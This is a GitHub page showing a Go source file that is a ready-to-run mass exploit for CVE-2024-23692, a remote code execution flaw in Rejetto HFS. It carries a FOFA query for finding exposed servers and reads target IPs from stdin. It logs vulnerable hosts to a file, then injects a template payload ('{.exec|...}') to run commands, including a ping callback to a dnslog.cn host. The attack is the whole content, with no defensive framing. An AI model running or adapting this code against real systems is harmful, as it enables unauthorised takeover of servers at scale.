-
Notifications
You must be signed in to change notification settings - Fork 0
/
hfs.go
123 lines (97 loc) · 3.07 KB
/
hfs.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
//CVE-2024-23692 Rejetto HTTP HFS服务器 RCE
//FOFA:body="HttpFileServer"
//TG https://t.me/WanLiChangChengWanLiChang
package main
import (
"bufio"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"sync"
"time"
)
func sendGet(ip, port string, commands []string, wg *sync.WaitGroup) {
defer wg.Done()
client := &http.Client{
Timeout: 20 * time.Second,
}
url := fmt.Sprintf("http://%s:%s/", ip, port)
req, err := http.NewRequest("GET", url, nil)
if err != nil {
fmt.Printf("Error creating GET request to %s:%s: %s\n", ip, port, err)
return
}
req.Header.Set("Host", ip)
req.Header.Set("Cache-Control", "max-age=0")
req.Header.Set("Upgrade-Insecure-Requests", "1")
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36")
req.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7")
req.Header.Set("Accept-Encoding", "gzip, deflate, br")
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
req.Header.Set("Cookie", "HFS_SID_=0.590236319694668")
resp, err := client.Do(req)
if err != nil {
fmt.Printf("Error sending GET request to %s:%s: %s\n", ip, port, err)
return
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Printf("Error reading response from %s:%s: %s\n", ip, port, err)
return
}
if resp.StatusCode == 200 && strings.Contains(string(body), `href="http://www.rejetto.com/hfs/"`) {
writeOkToFile(ip, port)
fmt.Printf("HFS detected for %s:%s\n", ip, port)
for _, cmd := range commands {
cmdURL := fmt.Sprintf("http://%s:%s/?n=%%0A&cmd=%s&search=%%25xxx%%25url%%25:%%password%%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}", ip, port, cmd)
cmdReq, err := http.NewRequest("GET", cmdURL, nil)
if err != nil {
fmt.Printf("Error creating GET request to %s:%s: %s\n", ip, port, err)
return
}
cmdReq.Header = req.Header
cmdResp, err := client.Do(cmdReq)
if err != nil {
fmt.Printf("Error sending GET request to %s:%s: %s\n", ip, port, err)
return
}
defer cmdResp.Body.Close()
_, err = ioutil.ReadAll(cmdResp.Body)
if err != nil {
fmt.Printf("Error reading response from %s:%s: %s\n", ip, port, err)
return
}
fmt.Printf("Executed command '%s' on %s:%s, response status: %s\n", cmd, ip, port, cmdResp.Status)
}
}
}
func writeOkToFile(ip, port string) {
f, err := os.OpenFile("okips.txt", os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
fmt.Printf("Error opening file: %s\n", err)
return
}
defer f.Close()
if _, err := f.WriteString(fmt.Sprintf("%s:%s\n", ip, port)); err != nil {
fmt.Printf("Error writing to file: %s\n", err)
}
}
func main() {
var wg sync.WaitGroup
port := os.Args[1]
// commands inject here
commands := []string{
"ping wlccwlc.dnslog.cn",
"whoami",
}
scan := bufio.NewScanner(os.Stdin)
for scan.Scan() {
ip := scan.Text()
wg.Add(1)
go sendGet(ip, port, commands, &wg)
}
wg.Wait()
}